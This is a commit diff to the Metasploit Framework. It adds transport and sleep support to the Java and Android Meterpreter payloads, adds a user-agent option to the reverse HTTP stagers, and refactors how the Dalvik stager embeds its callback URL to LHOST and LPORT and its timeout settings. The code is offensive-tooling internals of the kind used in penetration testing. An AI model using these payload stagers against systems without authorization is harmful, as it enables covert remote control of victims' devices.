Land rapid7#5608, android and java meterpreter transport and sleep support

This also includes stageless Windows meterpreter fixes for process migration.

Author: Brent Cook

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.3)
+      metasploit-payloads (= 1.0.4)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.3)
+    metasploit-payloads (1.0.4)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

lib/msf/core/handler/reverse_http.rb

@@ -313,21 +313,11 @@ def on_request(cli, req, obj)
         print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...")
         url = payload_uri(req) + conn_id + "/\x00"
 
-        blob = ""
-        blob << obj.generate_stage(
+        blob = obj.generate_stage(
           uuid: uuid,
           uri:  conn_id
         )
 
-        # This is a TLV packet - I guess somewhere there should be an API for building them
-        # in Metasploit :-)
-        packet = ""
-        packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"
-        packet << [url.length+8, 0x1000a].pack('NN')+url
-        packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN')
-        packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN')
-        blob << [packet.length+8, 0].pack('NN') + packet
-
         resp.body = blob
 
         # Short-circuit the payload's handle_connection processing for create_session

lib/msf/core/payload/dalvik.rb

@@ -32,8 +32,13 @@ def java_string(str)
   end
 
   def apply_options(classes)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
-    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+    timeouts = [
+      datastore['SessionExpirationTimeout'].to_s,
+      datastore['SessionCommunicationTimeout'].to_s,
+      datastore['SessionRetryTotal'].to_s,
+      datastore['SessionRetryWait'].to_s
+    ].join('-')
+    string_sub(classes, 'TTTT                                ', 'TTTT' + timeouts)
   end
 
   def string_sub(data, placeholder="", input="")

lib/msf/core/payload/java.rb

@@ -18,9 +18,9 @@ def generate_stage(opts={})
     stage = ''
     @stage_class_files.each do |path|
       data = MetasploitPayloads.read('java', path)
-      stage << ([data.length].pack("N") + data)
+      stage << [data.length, data].pack('NA*')
     end
-    stage << [0].pack("N")
+    stage << [0].pack('N')
 
     stage
   end

lib/msf/core/payload/transport_config.rb

@@ -61,6 +61,7 @@ def transport_config_reverse_http(opts={})
       :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
       :retry_total  => datastore['SessionRetryTotal'].to_i,
       :retry_wait   => datastore['SessionRetryWait'].to_i,
+      :ua           => datastore['MeterpreterUserAgent'],
       :proxy_host   => datastore['PayloadProxyHost'],
       :proxy_port   => datastore['PayloadProxyPort'],
       :proxy_type   => datastore['PayloadProxyType'],

lib/msf/core/payload/windows/reverse_http.rb

@@ -52,14 +52,14 @@ def generate(opts={})
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]         = generate_uri
-      conf[:exitfunk]    = datastore['EXITFUNC']
-      conf[:proxy_host]  = datastore['PayloadProxyHost']
-      conf[:proxy_port]  = datastore['PayloadProxyPort']
-      conf[:proxy_user]  = datastore['PayloadProxyUser']
-      conf[:proxy_pass]  = datastore['PayloadProxyPass']
-      conf[:proxy_type]  = datastore['PayloadProxyType']
-      conf[:retry_count] = datastore['StagerRetryCount']
+      conf[:url]        = generate_uri
+      conf[:exitfunk]   = datastore['EXITFUNC']
+      conf[:ua]         = datastore['MeterpreterUserAgent']
+      conf[:proxy_host] = datastore['PayloadProxyHost']
+      conf[:proxy_port] = datastore['PayloadProxyPort']
+      conf[:proxy_user] = datastore['PayloadProxyUser']
+      conf[:proxy_pass] = datastore['PayloadProxyPass']
+      conf[:proxy_type] = datastore['PayloadProxyType']
     end
 
     generate_reverse_http(conf)

lib/msf/core/payload/windows/x64/reverse_http.rb

@@ -58,6 +58,7 @@ def generate(opts={})
     unless self.available_space.nil? || required_space > self.available_space
       conf[:url]        = generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
+      conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
       conf[:proxy_port] = datastore['PayloadProxyPort']
       conf[:proxy_user] = datastore['PayloadProxyUser']

lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb

@@ -80,10 +80,10 @@ def commands
     if client.platform =~ /win/ || client.platform =~ /linux/
       # Migration only supported on windows and linux
       c["migrate"] = "Migrate the server to another process"
+    end
 
-
+    if client.platform =~ /win/ || client.platform =~ /linux/ || client.platform =~ /java/
       # Yet to implement transport hopping for other meterpreters.
-      # Works for posix and native windows though.
       c["transport"] = "Change the current transport mechanism"
 
       # sleep functionality relies on the transport features, so only

metasploit-framework.gemspec

@@ -62,7 +62,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.3'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.4'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

modules/payloads/stagers/android/reverse_http.rb

@@ -17,15 +17,15 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTP Stager',
-      'Description'   => 'Tunnel communication over HTTP',
-      'Author'        => 'anwarelmakrahy',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttp,
-      'Stager'        => {'Payload' => ""}
-      ))
+      'Name'        => 'Dalvik Reverse HTTP Stager',
+      'Description' => 'Tunnel communication over HTTP',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Stager'      => {'Payload' => ''}
+    ))
   end
 
   def generate_jar(opts={})
@@ -36,13 +36,12 @@ def generate_jar(opts={})
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    lurl << "/"
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    # TODO: perhaps wire in an existing UUID from opts?
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar = Rex::Zip::Jar.new